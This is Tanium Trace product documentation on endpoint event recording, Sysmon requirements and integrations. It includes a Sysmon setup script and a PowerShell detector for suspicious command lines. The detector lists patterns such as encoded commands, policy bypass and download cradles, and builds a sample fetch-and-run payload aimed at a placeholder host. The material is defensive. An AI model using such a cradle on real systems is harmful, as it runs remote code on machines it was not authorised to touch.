Trace overview

Use Trace to directly investigate key forensic and security events on Linux, Mac, and Windows endpoints across a network. Trace provides a live and historical view of critical events including process execution, logon history, network connections, and file and registry changes. The Trace solution consists of three parts:

  • The Trace event recorder that monitors event data on the endpoint.
  • The Trace interface where you can explore and manage endpoint Trace data.
  • The sensors that issue searches for Trace data across the entire enterprise.

About the Trace event recorder

The Trace event recorder continuously saves key forensic evidence on each endpoint. The event recorder monitors the endpoint kernel and other low-level subsystems to capture a variety of events.

Even an idle system quickly accumulates data. Trace intelligently collates similar events and efficiently stores them in a local database. The default configuration can retain up to several months of historical data. You can customize the amount of local storage that is consumed by Trace, and filter the types of recorded evidence.

Traditional disk and memory forensics techniques can successfully reconstruct fragments of endpoint activity, but are limited to the evidence that is natively preserved by the underlying operating system. This type of evidence from a period of interest can rapidly degrade as time elapses. Trace maintains a complete, easy-to-interpret history of events so you can replay recent system events.

Types of recorded events

Trace records a broad range of events, each with additional context, metadata, and a UTC timestamp. Recorded event examples include process execution, file system activity, registry changes, network connections, driver and library loads, and user authentication. You can specify which process, registry, network, file, and security events Trace records.

To keep the database meaningful and retain data for longer periods, consider excluding event types that occur in high volumes, such as writes to LanguageList registry values.

Event filtering is based on the following types:

Table 1:   Event types

Driver
    Driver load events, including the full path and hash. On Windows, the event also records whether the driver was digitally signed and by which entity.
    Driver events typically make up a small share of all events. You cannot filter driver events.

File
    File system events, such as files written to directory locations on the endpoint. The associated process and user context are included.
    Possible examples are a malware file being copied to a location that Windows Update uses, or content changes made to a file.

Network
    Network connection events, such as an HTTP request to an internet location, including the associated process and user context. Events are recorded for all inbound and outbound TCP and UDP connections.
      • Outbound: connections, attempts, successes, disconnects, and failures are logged.
      • Inbound: only accepted connections and disconnects are logged.

Process
    Process create, child process create, and process exit events. The full command line, MD5 hash, parent process metadata, and user context are included.

Registry [Windows only]
    Changes to the registry, including the creation or alteration of registry keys and values. The associated process and user context are included.

Security
    Security events, including authentication, privilege escalation, and more. This event type includes logon events even if the operating system logs have rolled.

DNS [Windows 8.1 or later]
    DNS request information, including the process path, user, query, response, and the type of operation.

Image [Windows only]
    Image load events, including:
      • The full path and hash
      • The entity that signed the image, or a designation of "Unsigned" if the image is not signed
    A possible example is the loading of an unsigned DLL.

Sources of event recorder data

The event recorder gathers data from multiple sources into a single, local database on the endpoint. Kernel events are gathered from Linux, Mac, and Windows tools. On Windows endpoints, the optional Microsoft Sysmon configuration provides additional information about the executed processes.

Some features of the Trace recorder require specific versions of Windows.

Table 2:   Trace recorder features

Feature                                  Server 2008 R2   Server 2012    Server 2012 R2 or later   Windows 7        Windows 8      Windows 8.1 or later
DNS events                               Not available    Not available  Available                 Not available    Not available  Available
Process hashes and command-line info     Requires Sysmon  Available      Available                 Requires Sysmon  Available      Available
Driver loads                             Available*       Available      Available                 Available*       Available      Available

* If Sysmon is configured, the driver load information recorded by Sysmon is used.
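The Sysmon dependency in Table 2 is easy to overlook on Windows 7 and Windows Server 2008 R2, where Trace cannot report process hashes or command lines without it. The following PowerShell is an added example, not Tanium's code and not a configuration that Tanium ships. It assumes Sysmon64.exe is in the current directory, that the installed Sysmon accepts configuration schema version 4.1, and that the service is named Sysmon64 (the name used by the 64-bit binary). It writes a minimal configuration that records every process-create and driver-load event with MD5 and SHA256 hashes, installs or updates Sysmon with it, and then reads the newest Sysmon events back to confirm that command lines and hashes are actually being recorded.

```powershell
# Added example, not Tanium code: give Trace the Sysmon data that Table 2
# says Windows 7 and Windows Server 2008 R2 need for process hashes and
# command lines, then verify that Sysmon is actually recording them.
# Assumptions: run from an elevated prompt, Sysmon64.exe is in the current
# directory, and the installed Sysmon accepts schema version 4.1
# (run .\Sysmon64.exe -? to see the version yours supports).

$ConfigPath = Join-Path $PWD 'sysmon-trace.xml'

# An empty "exclude" rule set records every event of that type. MD5 is
# included because Trace reports process MD5 hashes; SHA256 is added for
# matching against other threat-intelligence sources.
@'
<Sysmon schemaversion="4.1">
  <HashAlgorithms>MD5,SHA256</HashAlgorithms>
  <EventFiltering>
    <ProcessCreate onmatch="exclude" />
    <DriverLoad onmatch="exclude" />
  </EventFiltering>
</Sysmon>
'@ | Set-Content -Path $ConfigPath -Encoding ASCII

# The service is "Sysmon64" for the 64-bit binary ("Sysmon" for Sysmon.exe).
if (Get-Service -Name 'Sysmon64' -ErrorAction SilentlyContinue) {
    & .\Sysmon64.exe -c $ConfigPath               # update the live configuration
} else {
    & .\Sysmon64.exe -accepteula -i $ConfigPath   # first-time install
}

# Check: the newest ProcessCreate event (ID 1) must carry CommandLine and an
# MD5 hash, otherwise Trace has nothing to add on these Windows versions.
$log = 'Microsoft-Windows-Sysmon/Operational'
$msg = Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 1 } -MaxEvents 1 -ErrorAction SilentlyContinue |
    Select-Object -ExpandProperty Message
if ($msg -match 'CommandLine:' -and $msg -match 'Hashes: .*MD5=') {
    'OK: ProcessCreate events include the command line and MD5 hash'
} else {
    'Check the Sysmon configuration: no ProcessCreate event with CommandLine and MD5 found yet'
}

# Driver loads (ID 6) appear only when a driver is loaded, so an empty
# result right after install is normal; re-run after a reboot if needed.
Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 6 } -MaxEvents 1 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id
```

The empty exclude rule sets deliberately record everything so that the check is meaningful; narrow the ProcessCreate rules only after confirming that the fields Trace needs are present, and keep in mind that Sysmon's own log volume counts against the endpoint in the same way as the high-volume event types the page recommends filtering.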

Integration with other Tanium products

When Trace is coupled with other Tanium products, you can apply the findings from an investigation while it is still in progress or at any time afterward. Those findings are essential inputs to short-term and long-term remediation plans, which can be developed in parallel with the investigation from the start.

Tanium™ Connect

Trace uses data from Tanium Connect to elaborate on process and driver hash events. The source data adds details about these events for an at-a-glance reputation status assessment from multiple threat intelligence providers.

Tanium™ Incident Response

Trace works with Tanium Incident Response to provide enterprise hunting at scale. Use sensors from either solution to search across endpoints by operating system or intrusion lifecycle phase, and for specific types of evidence. For example, use the Autorun Program Details sensor to search for all persistent binaries in your environment. Some sensors also include common use buttons that fill parameter fields, such as the Trace Executed Processes PowerShell Suspicious Command Line Arguments search on Windows endpoints. The results from all endpoints are presented as an actionable Interact grid within Trace.
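The hunt behind the Trace Executed Processes PowerShell Suspicious Command Line Arguments search can be approximated outside Tanium. The following PowerShell is an added example, not the sensor's code or any Tanium code; it assumes process-execution records carrying the fields listed in Table 1 (time, user, parent, path, command line, MD5) and runs over two constructed sample records rather than real Trace output. The indicator list, the decoding of -EncodedCommand payloads, and the two-indicator reporting threshold are the example's own choices.

```powershell
# Added example, not the Tanium sensor's code: flag suspicious PowerShell
# launches in process-execution records shaped like the Table 1 fields
# (time, user, parent, path, command line, MD5). The indicator list and the
# two-indicator threshold are this example's own choices; the sample
# records are constructed, not real Trace data.

# Indicators commonly seen in malicious PowerShell launches, as regexes.
# PowerShell's -match operator is case-insensitive by default.
$SuspiciousPatterns = @(
    '(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}',  # encoded payload
    '(^|\s)-(nop|noprofile)\b',                               # profile skipped
    '(^|\s)-(w|windowstyle)\s+hidden\b',                      # hidden window
    '(^|\s)-(ep|executionpolicy)\s+bypass\b',                 # policy bypass
    '\b(iex|invoke-expression)\b',                            # string eval
    'downloadstring|downloadfile|net\.webclient',             # download cradle
    'frombase64string'                                        # inline decoding
)

function Get-DecodedCommand {
    # Return the UTF-16LE text behind -EncodedCommand, or $null if absent
    # or not valid base64.
    param([string]$CommandLine)
    if ($CommandLine -match '(^|\s)-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3])) }
        catch { return $null }
    }
    return $null
}

function Test-SuspiciousPowerShell {
    # Return the indicators matched by one record. Only powershell.exe
    # launches are scored; the decoded payload is scanned as well, since
    # the cradle usually hides inside -EncodedCommand.
    param($Record)
    $hits = @()
    if ($Record.Path -notmatch 'powershell(_ise)?\.exe$') { return ,$hits }
    $text = $Record.CommandLine
    $decoded = Get-DecodedCommand $Record.CommandLine
    if ($decoded) { $text += ' ' + $decoded }
    foreach ($p in $SuspiciousPatterns) { if ($text -match $p) { $hits += $p } }
    return ,$hits
}

# Constructed sample records. The first is a benign scheduled backup (one
# indicator: -NoProfile); the second is a Word-spawned download cradle.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$PsPath = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$Records = @(
    [pscustomobject]@{ Time = '2018-06-12T13:05:41Z'; User = 'CORP\svc-backup'; Parent = 'taskeng.exe';
        Path = $PsPath; CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\backup.ps1';
        MD5 = 'd41d8cd98f00b204e9800998ecf8427e' }   # placeholder hash
    [pscustomobject]@{ Time = '2018-06-12T13:07:02Z'; User = 'CORP\jdoe'; Parent = 'WINWORD.EXE';
        Path = $PsPath; CommandLine = "powershell.exe -nop -w hidden -enc $enc";
        MD5 = 'd41d8cd98f00b204e9800998ecf8427e' }   # placeholder hash
)

# Report records with two or more indicators; -NoProfile alone is routine
# in scheduled tasks and would swamp the results.
foreach ($r in $Records) {
    $hits = @(Test-SuspiciousPowerShell $r)
    if ($hits.Count -ge 2) {
        '{0} user={1} parent={2} indicators={3}' -f $r.Time, $r.User, $r.Parent, $hits.Count
        '  cmd: ' + $r.CommandLine
        $d = Get-DecodedCommand $r.CommandLine
        if ($d) { '  decoded: ' + $d }
    }
}
```

Only the second record is reported: it matches the encoded-payload, profile-skip and hidden-window indicators on the command line itself, and the IEX and download-cradle indicators inside the decoded payload. The parent process is printed because an Office application spawning PowerShell is usually the strongest single signal, and it is exactly the parent metadata that Table 1 says the Process event type preserves.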

Tanium™ Detect

Use Trace saved evidence from analyzed endpoints to create Tanium Detect indicators of compromise (IOC) intel documents to scan endpoints across the network. The event recorder monitors for Detect signals and notifies Detect if any events match the signal. Missing a single infected system, backdoor command-and-control address, or compromised set of user credentials can potentially allow an attacker to easily regain access and nullify the entire remediation effort.

Tanium™ Protect

Use Trace findings to create process and network rule policies for Windows endpoints in Tanium Protect to prevent future incidents across the network. Failing to identify and address more fundamental vulnerabilities exploited during an incident leaves the organization with no net improvement to their security posture.

Tanium™ Trends

Use any of the Trace saved questions in Tanium Trends boards and panels to provide graphical representation of Trace data overall. Trends can pivot from the overall view to Tanium Interact for specific responses by endpoint.

Figure 1: Trends bar chart showing Trace database health by endpoint count

To obtain a license for these and other Tanium products, contact your Tanium Technical Account Manager (TAM).

Last updated: 6/12/2018 4:02 PM